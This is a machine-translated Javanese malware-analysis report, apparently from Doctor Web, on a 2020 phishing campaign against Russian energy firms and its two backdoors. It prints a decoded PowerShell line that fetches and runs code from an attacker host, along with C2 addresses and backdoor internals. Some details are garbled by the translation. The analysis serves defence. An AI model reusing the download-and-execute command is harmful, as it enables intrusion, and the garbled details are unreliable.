Pengalaman kita nyelidiki insiden keamanan komputer nuduhake manawa email isih dadi salah sawijining saluran sing paling umum digunakake para panyerang kanggo nembus infrastruktur jaringan sing diserang. Siji tumindak ceroboh kanthi surat sing curiga (utawa ora curiga) dadi titik entri kanggo infeksi luwih lanjut, mula para penjahat cyber aktif nggunakake metode teknik sosial, sanajan kanthi sukses sing beda-beda.
Ing kirim iki, kita arep ngomong babagan penyelidikan anyar babagan kampanye spam sing ngarahake sawetara perusahaan ing kompleks bahan bakar lan energi Rusia. Kabeh serangan ngetutake skenario sing padha nggunakake email palsu, lan ora ana sing ngupayakake isi teks email kasebut.
Layanan intelijen
Kabeh diwiwiti ing pungkasan April 2020, nalika analis virus Doctor Web ndeteksi kampanye spam ing ngendi peretas ngirim direktori telpon sing dianyari menyang karyawan sawetara perusahaan ing kompleks bahan bakar lan energi Rusia. Mesthi wae, iki dudu masalah sing gampang, amarga direktori kasebut ora nyata, lan dokumen .docx ndownload rong gambar saka sumber daya sing adoh.
Salah sijine diundhuh menyang komputer pangguna saka server berita [.]zannews[.]com. Wigati dicathet yen jeneng domain padha karo domain pusat media anti-korupsi Kazakhstan - zannews[.]kz. Ing sisih liya, domain sing digunakake langsung kaya kampanye 2015 liyane sing dikenal minangka TOPNEWS, sing nggunakake backdoor ICEFOG lan duwe domain kontrol Trojan kanthi substring "kabar" ing jenenge. Fitur liyane sing menarik yaiku nalika ngirim email menyang panampa sing beda-beda, panjalukan kanggo ngundhuh gambar nggunakake parameter panyuwunan sing beda utawa jeneng gambar sing unik.
Kita pitados bilih iki wis rampung kanggo tujuan ngumpulake informasi kanggo ngenali addressee "dipercaya", sing banjur bakal dijamin kanggo mbukak layang ing wektu tengen. Protokol SMB digunakake kanggo ngundhuh gambar saka server kapindho, sing bisa ditindakake kanggo ngumpulake hash NetNTLM saka komputer karyawan sing mbukak dokumen sing ditampa.
Lan iki surat kasebut kanthi direktori palsu:
Ing wulan Juni taun iki, peretas wiwit nggunakake jeneng domain anyar, olahraga [.]manhajnews[.]com, kanggo ngunggah gambar. Analisis kasebut nuduhake manawa subdomain manhajnews[.]com wis digunakake ing surat spam paling ora wiwit September 2019. Salah sawijining target kampanye iki yaiku universitas Rusia sing gedhe.
Uga, ing wulan Juni, para penyelenggara serangan teka karo teks anyar kanggo surat-surate: wektu iki dokumen kasebut ngemot informasi babagan pangembangan industri. Teks surat kasebut kanthi jelas nuduhake manawa penulise ora dadi penutur asli Rusia, utawa kanthi sengaja nggawe kesan babagan awake dhewe. Sayange, gagasan pembangunan industri, minangka tansah, dadi mung tutup - document maneh diundhuh loro gambar, nalika server diganti kanggo download [.]inklingpaper[.]com.
Inovasi sabanjure ditindakake ing wulan Juli. Ing upaya kanggo ngliwati deteksi dokumen ala dening program antivirus, panyerang wiwit nggunakake dokumen Microsoft Word sing dienkripsi nganggo sandhi. Ing wektu sing padha, para panyerang mutusake nggunakake teknik teknik sosial klasik - kabar ganjaran.
Teks banding kasebut maneh ditulis kanthi gaya sing padha, sing nyebabake rasa curiga ing antarane sing dituju. Server kanggo ngundhuh gambar uga ora owah.
Elinga yen ing kabeh kasus, kothak layang elektronik sing didaftar ing mail[.]ru lan yandex[.] domain ru digunakake kanggo ngirim layang.
Serangan
Ing awal September 2020, wektune kanggo tumindak. Analis virus kita nyathet gelombang serangan anyar, ing ngendi panyerang ngirim surat maneh kanthi pretext nganyari direktori telpon. Nanging, wektu iki lampiran kasebut ngemot makro sing mbebayani.
Nalika mbukak dokumen sing dilampirake, makro nggawe rong file:
- VBS script% APPDATA% microsoftwindowsstart menuprogramsstartupadoba.vbs, kang dimaksudaké kanggo miwiti file kumpulan;
- Batch file dhewe% APPDATA% configstest.bat, kang obfuscated.
Inti saka karya kasebut yaiku ngluncurake cangkang Powershell kanthi paramèter tartamtu. Parameter sing dikirim menyang cangkang didekode dadi perintah:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Kaya ing ngisor iki saka prentah sing disedhiyakake, domain sing diundhuh muatan kasebut maneh nyamar dadi situs warta. A prasaja , sing mung tugas kanggo nampa shellcode saka printah lan kontrol server lan nglakokaké. Kita bisa ngenali rong jinis backdoors sing bisa diinstal ing PC korban.
BackDoor.Siggen2.3238
Sing pertama yaiku BackDoor.Siggen2.3238 — spesialis kita durung ditemoni sadurunge, lan uga ora ana sing nyebutake program iki dening vendor antivirus liyane.
Program iki minangka backdoor sing ditulis ing C ++ lan mlaku ing sistem operasi Windows 32-bit.
BackDoor.Siggen2.3238 bisa komunikasi karo server manajemen nggunakake rong protokol: HTTP lan HTTPS. Sampel sing diuji nggunakake protokol HTTPS. Agen pangguna ing ngisor iki digunakake kanggo panjaluk menyang server:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Ing kasus iki, kabeh panjalukan diwenehake karo set paramèter ing ngisor iki:
%s;type=%s;length=%s;realdata=%send
ing ngendi saben baris %s diganti karo:
- ID komputer sing kena infeksi,
- jinis panjalukan sing dikirim,
- dawane data ing lapangan realdata,
- data
Ing tahap ngumpulake informasi babagan sistem sing kena infeksi, backdoor ngasilake garis kaya:
lan=%s;cmpname=%s;username=%s;version=%s;
ngendi lan iku alamat IP saka komputer infèksi, cmpname iku jeneng komputer, jeneng panganggo iku jeneng panganggo, versi baris 0.0.4.03.
Informasi iki karo pengenal sysinfo dikirim liwat request POST kanggo server kontrol dumunung ing https [:]//31.214[.]157.14/log.txt. Yen nanggapi BackDoor.Siggen2.3238 nampa sinyal HEART, sambungan dianggep sukses, lan backdoor wiwit siklus utama komunikasi karo server.
Katrangan luwih lengkap babagan prinsip operasi BackDoor.Siggen2.3238 ana ing kita .
BackDoor.Whitebird.23
Program kapindho yaiku modifikasi backdoor BackDoor.Whitebird, sing wis kita kenal saka kedadeyan karo lembaga pemerintah ing Kazakhstan. Versi iki ditulis ing C++ lan dirancang kanggo mbukak ing sistem operasi Windows 32-bit lan 64-bit.
Kaya umume program jinis iki, BackDoor.Whitebird.23 dirancang kanggo nggawe sambungan ndhelik karo server kontrol lan kontrol ora sah saka komputer infèksi. Diinstal menyang sistem kompromi nggunakake dropper .
Sampel sing kita priksa yaiku perpustakaan jahat kanthi rong ekspor:
- Google Play
- Test.
Ing wiwitan karya, dekripsi konfigurasi hardwired menyang awak backdoor nggunakake algoritma adhedhasar operasi XOR karo byte 0x99. Konfigurasi katon kaya:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Kanggo mesthekake operasi pancet, backdoor ngganti nilai kasebut ing lapangan jam kerjo konfigurasi. Lapangan kasebut ngemot 1440 bita, sing njupuk nilai 0 utawa 1 lan makili saben menit saben jam saben dinane. Nggawe thread kapisah kanggo saben antarmuka jaringan sing ngrungokake antarmuka lan nggoleki paket wewenang ing server proxy saka komputer sing kena infeksi. Nalika paket kasebut dideteksi, backdoor nambah informasi babagan server proxy menyang dhaptar. Kajaba iku, mriksa anané proxy liwat WinAPI InternetQueryOptionW.
Program mriksa menit lan jam saiki lan mbandhingake karo data ing lapangan jam kerjo konfigurasi. Yen nilai kanggo menit sing cocog ing dina ora nol, banjur sambungan digawe karo server kontrol.
Nggawe sambungan menyang server simulasi nggawe sambungan nggunakake protokol TLS versi 1.0 antarane klien lan server. Awak lawang mburi ngemot rong buffer.
Buffer pisanan ngemot paket Hello Klien TLS 1.0.
Buffer kapindho ngemot paket TLS 1.0 Client Key Exchange kanthi dawa kunci 0x100 bita, Ganti Spesifikasi Cipher, Pesen Jabat Tangan sing Dienkripsi.
Nalika ngirim paket Hello Klien, lawang mburi nulis 4 bita wektu saiki lan 28 bita data pseudo-acak ing kolom Acak Klien, diitung kaya ing ngisor iki:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Paket sing ditampa dikirim menyang server kontrol. Tanggapan (paket Hello Server) mriksa:
- selaras karo protokol TLS versi 1.0;
- korespondensi cap wektu (4 bita pisanan saka kolom paket Data Acak) sing ditemtokake dening klien menyang cap wektu sing ditemtokake dening server;
- cocog saka 4 bait pisanan sawise timestamp ing lapangan Random Data klien lan server.
Ing kasus sing cocog, lawang mburi nyiapake paket Client Key Exchange. Kanggo nindakake iki, ngowahi Kunci Umum ing paket Exchange Key Klien, uga Enkripsi IV lan Data Enkripsi ing paket Pesen Jabat Tangan sing Dienkripsi.
Backdoor banjur nampa paket saka printah lan kontrol server, mriksa sing protokol TLS versi 1.0, lan banjur nampa liyane 54 bait (awak saka paket). Iki ngrampungake persiyapan sambungan.
Katrangan luwih lengkap babagan prinsip operasi BackDoor.Whitebird.23 ana ing kita .
Kesimpulan lan kesimpulan
Analisis dokumen, malware, lan infrastruktur sing digunakake ngidini kita ngomong kanthi yakin manawa serangan kasebut disiapake dening salah sawijining klompok APT China. Ngelingi fungsi backdoors sing diinstal ing komputer korban ing acara saka serangan sukses, infèksi ndadékaké, ing minimal, kanggo nyolong informasi rahasia saka komputer saka organisasi sing diserang.
Kajaba iku, skenario sing paling mungkin yaiku instalasi Trojan khusus ing server lokal kanthi fungsi khusus. Iki bisa dadi pengontrol domain, server mail, gateway Internet, lan sapiturute Kaya sing bisa dideleng ing conto kasebut , server kasebut dadi kapentingan khusus kanggo panyerang amarga macem-macem alasan.
Source: www.habr.com